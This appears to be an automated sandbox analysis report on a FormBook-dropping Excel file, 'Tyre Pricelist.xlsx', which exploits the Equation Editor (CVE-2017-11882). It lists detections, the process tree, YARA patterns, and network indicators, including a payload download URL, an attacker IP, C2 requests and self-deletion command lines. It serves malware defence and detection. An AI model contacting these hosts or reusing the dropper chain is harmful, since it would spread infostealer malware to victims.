
Analysis Report Tyre Pricelist.xlsx

Overview

General Information

Sample Name: Tyre Pricelist.xlsx
Analysis ID: 321115
MD5: 3b5f7a2a0429e796040aa5bc3763a8fe
SHA1: c049ac5a44d034995a55bd5f49aece9631c69c1f
SHA256: 9853da661450f9b9a4c06dc952bc70d7cdd8e80cf7e9f8189f2d15682bd88434
Tags: Formbook, VelvetSweatshop, xlsx


Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Drops PE files to the user root directory
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match


Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2300 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2332 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2816 cmdline: 'C:\Users\Public\vbc.exe' MD5: 429BBA6DBE159C300679509BE3085665)
      • RegAsm.exe (PID: 2884 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: ADF76F395D5A0ECBBF005390B73C3FD2)
      • RegAsm.exe (PID: 2464 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: ADF76F395D5A0ECBBF005390B73C3FD2)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • NETSTAT.EXE (PID: 2832 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 32297BB17E6EC700D0FC869F9ACAF561)
            • cmd.exe (PID: 2220 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
      • cmd.exe (PID: 2468 cmdline: 'C:\Windows\System32\cmd.exe' /C choice /C Y /N /D Y /T 3 & Del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
        • choice.exe (PID: 2368 cmdline: choice /C Y /N /D Y /T 3 MD5: 11DDFBF834BB2C6F4D23297D80EE9E45)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0xa3a98:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xa3d02:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xaf825:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0xaf311:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0xaf927:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0xafa9f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa471a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0xae58c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa5413:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0xb54c7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xb64ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      4.2.vbc.exe.510000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        4.2.vbc.exe.510000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.vbc.exe.510000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x183f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1850c:$sqlite3step: 68 34 1C 7B E1
        • 0x18428:$sqlite3text: 68 38 2A 90 C5
        • 0x1854d:$sqlite3text: 68 38 2A 90 C5
        • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
        4.2.vbc.exe.510000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          4.2.vbc.exe.510000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          System Summary:

          Sigma detected: Droppers Exploiting CVE-2017-11882
          Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2332, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2816
          Sigma detected: EQNEDT32.EXE connecting to internet
          Source: Network Connection, Author: Joe Security, Data: DestinationIp: 103.125.191.5, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2332, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXE
          Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2332, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
          Sigma detected: Executables Started in Suspicious Folder
          Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2332, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2816
          Sigma detected: Execution in Non-Executable Folder
          Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2332, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2816
          Sigma detected: Suspicious Program Location Process Starts
          Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2332, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2816

          Signature Overview


          AV Detection:

          Antivirus detection for dropped file
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe, Avira: detection malicious, Label: TR/AD.Swotter.sxyuz
          Source: C:\Users\Public\vbc.exe, Avira: detection malicious, Label: TR/AD.Swotter.sxyuz
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe, ReversingLabs: Detection: 33%
          Source: C:\Users\Public\vbc.exe, ReversingLabs: Detection: 33%
          Multi AV Scanner detection for submitted file
          Source: Tyre Pricelist.xlsx, Virustotal: Detection: 27%
          Source: Tyre Pricelist.xlsx, ReversingLabs: Detection: 20%
          Yara detected FormBook
          Source: Yara match, File source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 4.2.vbc.exe.510000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.2.vbc.exe.510000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe, Joe Sandbox ML: detected
          Source: C:\Users\Public\vbc.exe, Joe Sandbox ML: detected
          Source: 4.2.vbc.exe.510000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.2.RegAsm.exe.400000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe
          Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 4x nop then pop esi, 6_2_00417295
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 4x nop then pop esi, 6_2_004172A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4x nop then pop esi, 11_2_00097295
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4x nop then pop esi, 11_2_000972A5
          Source: global traffic, DNS query: name: workfinethdysanotherrainbowlomoyentthghf.ydns.eu
          Source: global traffic, TCP traffic: 192.168.2.22:49165 -> 103.125.191.5:80

          Networking:

          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: Traffic, Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49165 -> 103.125.191.5:80
          Uses netstat to query active network connections and open ports
          Source: unknown, Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK | Date: Fri, 20 Nov 2020 10:23:44 GMT | Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38 | Last-Modified: Thu, 19 Nov 2020 21:43:46 GMT | ETag: "92600-5b47c9f64afa6" | Accept-Ranges: bytes | Content-Length: 599552 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdownload
          Source: global traffic, HTTP traffic detected: GET /kgw/?UL0tlN9h=3DxvAc+RnyJZYPd+jiD/A7jyp+1eDPaflq2WzCVhzhMiI/AcsKs8L0UbA7cJFll24IqQXw==&_L30=xTm4lrNPut HTTP/1.1 | Host: www.pestigenix.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /kgw/?UL0tlN9h=3e4oHR0srMrz4pb/7ChAIv3inAbNRhZBDtLZ1SN+NiEwBpgcLnXYR/VVRXtAcpgPjhXSMA==&_L30=xTm4lrNPut HTTP/1.1 | Host: www.atlanticdentallab.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: Joe Sandbox View, ASN Name: SEDO-ASDE SEDO-ASDE
          Source: Joe Sandbox View, ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
          Source: Joe Sandbox View, ASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG
          Source: global traffic, HTTP traffic detected: GET /worksdoc/svchost.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: workfinethdysanotherrainbowlomoyentthghf.ydns.eu | Connection: Keep-Alive
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
          Source: unknown, DNS traffic detected: queries for: workfinethdysanotherrainbowlomoyentthghf.ydns.eu
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000008.00000000.2195388777.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000008.00000000.2195388777.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: vbc.exe, 00000004.00000003.2189382975.0000000004C60000.00000004.00000001.sdmpString found in binary or memory: http://ns.a
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: vbc.exe, 00000004.00000002.2195649466.00000000064A0000.00000002.00000001.sdmp, RegAsm.exe, 00000006.00000002.2219630675.0000000002120000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2189359116.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
